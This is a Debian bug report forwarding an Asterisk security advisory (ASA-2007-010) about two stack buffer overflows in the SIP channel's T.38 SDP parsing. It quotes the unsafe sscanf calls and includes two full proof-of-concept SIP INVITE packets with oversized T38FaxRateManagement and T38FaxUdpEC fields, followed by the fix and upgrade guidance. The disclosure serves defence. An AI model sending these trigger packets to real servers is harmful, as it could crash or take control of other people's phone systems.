Package: asterisk Version: 1:1.4.2~dfsg-4 Severity: important ----- Forwarded message from Asterisk Development Team <[EMAIL PROTECTED]> -----
Envelope-to: [EMAIL PROTECTED] From: Asterisk Development Team <[EMAIL PROTECTED]> Organization: Digium, Inc. To: undisclosed-recipients: ; Subject: [asterisk-announce] ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code X-BeenThere: [EMAIL PROTECTED] X-Mailman-Version: 2.1.5 List-Id: asterisk-announce.lists.digium.com List-Unsubscribe: <http://lists.digium.com/mailman/listinfo/asterisk-announce>, <mailto:[EMAIL PROTECTED]> List-Archive: <http://lists.digium.com/pipermail/asterisk-announce> List-Post: <mailto:[EMAIL PROTECTED]> List-Help: <mailto:[EMAIL PROTECTED]> List-Subscribe: <http://lists.digium.com/mailman/listinfo/asterisk-announce>, <mailto:[EMAIL PROTECTED]> > Asterisk Project Security Advisory - ASA-2007-010 > > +------------------------------------------------------------------------+ > | Product | Asterisk | > |--------------------+---------------------------------------------------| > | Summary | Two stack buffer overflows in SIP channel's T.38 | > | | SDP parsing code | > |--------------------+---------------------------------------------------| > | Nature of Advisory | Exploitable Stack Buffer Overflow | > |--------------------+---------------------------------------------------| > | Susceptibility | Remote Unauthenticated Sessions | > |--------------------+---------------------------------------------------| > | Severity | Moderate | > |--------------------+---------------------------------------------------| > | Exploits Known | No | > |--------------------+---------------------------------------------------| > | Reported On | March 22, 2007 | > |--------------------+---------------------------------------------------| > | Reported By | Barrie Dempster, NGS Software, | > | | <[EMAIL PROTECTED]> | > |--------------------+---------------------------------------------------| > | Posted On | April 24, 2007 | > |--------------------+---------------------------------------------------| > | Last Updated On | April 24, 2007 | > |--------------------+---------------------------------------------------| > | Advisory Contact | [EMAIL PROTECTED] | > +------------------------------------------------------------------------+ > > +------------------------------------------------------------------------------------+ > |Description|Two closely related stack based buffer overflows exist in the > SIP/SDP | > | |handler of Asterisk, the vulnerabilities are very similar but > exist as | > | |two separate unsafe function calls. The T38FaxRateManagement and > | > | |T38FaxUdpEC SDP parameters can be exploited remotely leading to > | > | |arbitrary code execution without authentication. In order for > these | > | |overflows to occur, t38 fax over SIP must be enabled in > sip.conf. | > | |Examples of SIP INVITE packets are shown below, however these > | > | |vulnerabilities can be triggered with a number of different SIP > messages| > | |affecting calls received by Asterisk, or in response to calls > made by | > | |Asterisk. > | > | | > | > | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP > | > | |T38FaxRateManagement parameter > | > | | > | > | |A remote unauthenticated stack overflow exists in the SIP/SDP > handler of| > | |Asterisk. By sending a SIP packet with SDP data which includes > an overly| > | |long T38 parameter it is possible to overflow a stack based > buffer and | > | |execute arbitrary code. > | > | | > | > | |The process_sdp function of chan_sip.c in Asterisk contains the > | > | |following vulnerable call to sscanf. > | > | | > | > | |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) { > | > | | > | > | |found = 1; > | > | | > | > | |if (option_debug > 2) > | > | | > | > | |ast_log(LOG_DEBUG, "RateMangement: %s\n", s); > | > | | > | > | |if (!strcasecmp(s, "localTCF")) > | > | | > | > | |peert38capability |= > | > | | > | > | |T38FAX_RATE_MANAGEMENT_LOCAL_TCF; > | > | | > | > | |else if (!strcasecmp(s, "transferredTCF")) > | > | | > | > | |peert38capability |= > | > | | > | > | |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF; > | > | | > | > | |This attempts to read the "T38FaxRateManagement:" option from > the SDP | > | |within a SIP packet and copy the succeeding string into "s". > There are | > | |no checks on the length of this string and we can therefore > write past | > | |the boundaries of the "s" variable overwriting adjacent memory > on the | > | |stack. "s" is defined earlier in this function as being a > character | > | |array of only 256 bytes. The following example packet > demonstrates an | > | |overflow of this parameter: > | > | | > | > | |INVITE sip:[EMAIL PROTECTED] SIP/2.0 > | > | | > | > | |Date: Wed, 21 Mar 2007 4:20:09 GMT > | > | | > | > | |CSeq: 1 INVITE > | > | | > | > | |Via: SIP/2.0/UDP > | > | | > | > | > |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport| > | | > | > | |User-Agent: NGS/2.0 > | > | | > | > | |From: "Barrie Dempster" > | > | | > | > | |<sip:[EMAIL > PROTECTED]:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 | > | | > | > | |Call-ID: [EMAIL PROTECTED] | > | | > | > | |To: <sip:[EMAIL PROTECTED]> > | > | | > | > | |Contact: <sip:[EMAIL PROTECTED]:5068;transport=udp> > | > | | > | > | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE > | > | | > | > | |Content-Type: application/sdp > | > | | > | > | |Content-Length: 796 > | > | | > | > | |Max-Forwards: 70 > | > | | > | > | |v=0 > | > | | > | > | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 > | > | | > | > | |s=- > | > | | > | > | |c=IN IP4 127.0.0.1 > | > | | > | > | |t=0 0 > | > | | > | > | |m=image 5004 UDPTL t38 > | > | | > | > | |a=T38FaxVersion:0 > | > | | > | > | |a=T38MaxBitRate:14400 > | > | | > | > | |a=T38FaxMaxBuffer:1024 > | > | | > | > | |a=T38FaxMaxDatagram:238 > | > | | > | > | > |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAA > | > | | > | > | |a=T38FaxUdpEC:t38UDPRedundancy > | > | | > | > | |------------------------------------------------- > | > | | > | > | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP > T38FaxUdpEC | > | |parameter > | > | | > | > | |A remote unauthenticated stack overflow exists in the SIP/SDP > handler of| > | |Asterisk. By sending a SIP packet with SDP data which includes > an overly| > | |long T38FaxUdpEC parameter it is possible to overflow a stack > based | > | |buffer and execute arbitrary code. > | > | | > | > | |The process_sdp function of chan_sip.c in Asterisk contains the > | > | |following vulnerable call to sscanf. > | > | | > | > | |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) { > | > | | > | > | |found = 1; > | > | | > | > | |if (option_debug > 2) > | > | | > | > | |ast_log(LOG_DEBUG, "UDP EC: %s\n", s); > | > | | > | > | |if (!strcasecmp(s, "t38UDPRedundancy")) { > | > | | > | > | |peert38capability |= > | > | | > | > | |T38FAX_UDP_EC_REDUNDANCY; > | > | | > | > | |ast_udptl_set_error_correction_scheme(p->udptl, > | > | | > | > | |UDPTL_ERROR_CORRECTION_REDUNDANCY); > | > | | > | > | |This attempts to read the "T38FaxUdpEC:" option from the SDP > within a | > | |SIP packet and copy the succeeding string into "s". There are no > checks | > | |on the length of this string and we can therefore write past the > | > | |boundaries of the "s" variable overwriting adjacent memory on > the stack.| > | |"s" is defined earlier in this function as being a character > array of | > | |only 256 bytes. The following example packet demonstrates an > overflow of| > | |this parameter: > | > | | > | > | |INVITE sip:[EMAIL PROTECTED] SIP/2.0 > | > | | > | > | |Date: Wed, 21 Mar 2007 4:20:09 GMT > | > | | > | > | |CSeq: 1 INVITE > | > | | > | > | |Via: SIP/2.0/UDP > | > | | > | > | > |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport| > | | > | > | |User-Agent: NGS/2.0 > | > | | > | > | |From: "Barrie Dempster" > | > | | > | > | |<sip:[EMAIL > PROTECTED]:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 | > | | > | > | |Call-ID: [EMAIL PROTECTED] | > | | > | > | |To: <sip:[EMAIL PROTECTED]> > | > | | > | > | |Contact: <sip:[EMAIL PROTECTED]:5068;transport=udp> > | > | | > | > | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE > | > | | > | > | |Content-Type: application/sdp > | > | | > | > | |Content-Length: 796 > | > | | > | > | |Max-Forwards: 70 > | > | | > | > | |v=0 > | > | | > | > | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 > | > | | > | > | |s=- > | > | | > | > | |c=IN IP4 127.0.0.1 > | > | | > | > | |t=0 0 > | > | | > | > | |m=image 5004 UDPTL t38 > | > | | > | > | |a=T38FaxVersion:0 > | > | | > | > | |a=T38MaxBitRate:14400 > | > | | > | > | |a=T38FaxMaxBuffer:1024 > | > | | > | > | |a=T38FaxMaxDatagram:238 > | > | | > | > | > |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > | > | | > | > | |AAAAAAAAA > | > +------------------------------------------------------------------------------------+ > > +------------------------------------------------------------------------+ > | Resolution | T.38 support in the affected versions of Asterisk is not | > | | enabled by default, therefore the severity of this issue | > | | is 'moderate'. | > | | | > | | Users who are using the default configuration with | > | | 't38_udptl' set to 'no' or an equivalent value are not | > | | susceptible to this vulnerability. Users who have set | > | | this configuration item to 'yes' or an equivalent value | > | | but are not actually using T.38 support can set it to | > | | 'no' to secure their systems against this vulnerability. | > | | | > | | All other users are urged to upgrade to the appropriate | > | | version of their Asterisk product listed in the | > | | 'Corrected In' section below. | > +------------------------------------------------------------------------+ > > +------------------------------------------------------------------------+ > | Affected Versions | > |------------------------------------------------------------------------| > | Product | Release | | > | | Series | | > |------------------------------+-------------+---------------------------| > | Asterisk Open Source | 1.0.x | not affected; does not | > | | | contain T.38 support | > |------------------------------+-------------+---------------------------| > | Asterisk Open Source | 1.2.x | not affected, does not | > | | | contain T.38 support | > |------------------------------+-------------+---------------------------| > | Asterisk Open Source | 1.4.x | all releases prior to | > | | | 1.4.3 | > |------------------------------+-------------+---------------------------| > | Asterisk Business Edition | A.x.x | not affected, does not | > | | | contain T.38 support | > |------------------------------+-------------+---------------------------| > | Asterisk Business Edition | B.x.x | not affected, does not | > | | | contain T.38 support | > |------------------------------+-------------+---------------------------| > | AsteriskNOW | pre-release | all releases prior to and | > | | | including Beta 5 | > |------------------------------+-------------+---------------------------| > | Asterisk Appliance Developer | 0.x.x | all releases prior to | > | Kit | | 0.4.0 | > +------------------------------------------------------------------------+ > > +------------------------------------------------------------------------+ > | Corrected In | > |------------------------------------------------------------------------| > | Product | Release | > |--------------------+---------------------------------------------------| > | Asterisk Open | 1.4.3, available from | > | Source | ftp://ftp.digium.com/pub/telephony/asterisk | > |--------------------+---------------------------------------------------| > | AsteriskNOW | Beta 6, when available from | > | | http://www.asterisknow.org, Beta 5 users can use | > | | use 'System Update' in the appliance control | > | | panel to update their version of AsteriskNOW | > |--------------------+---------------------------------------------------| > | Asterisk Appliance | 0.4.0, available from | > | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk | > +------------------------------------------------------------------------+ > > +------------------------------------------------------------------------+ > | Links | | > +------------------------------------------------------------------------+ > > +------------------------------------------------------------------------+ > | Asterisk Project Security Advisories are posted at | > | http://www.asterisk.org/security. | > | | > | This document may be superseded by later versions; if so, the latest | > | version will be posted at | > | http://www.asterisk.org/files/ASA-2007-010.pdf. | > +------------------------------------------------------------------------+ > > Asterisk Project Security Advisory - ASA-2007-010 > Copyright (c) 2007 Digium, Inc. All Rights Reserved. > Permission is hereby granted to distribute and publish this advisory in its > original, unaltered form. _______________________________________________ --Bandwidth and Colocation provided by Easynews.com -- asterisk-announce mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-announce ----- End forwarded message ----- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
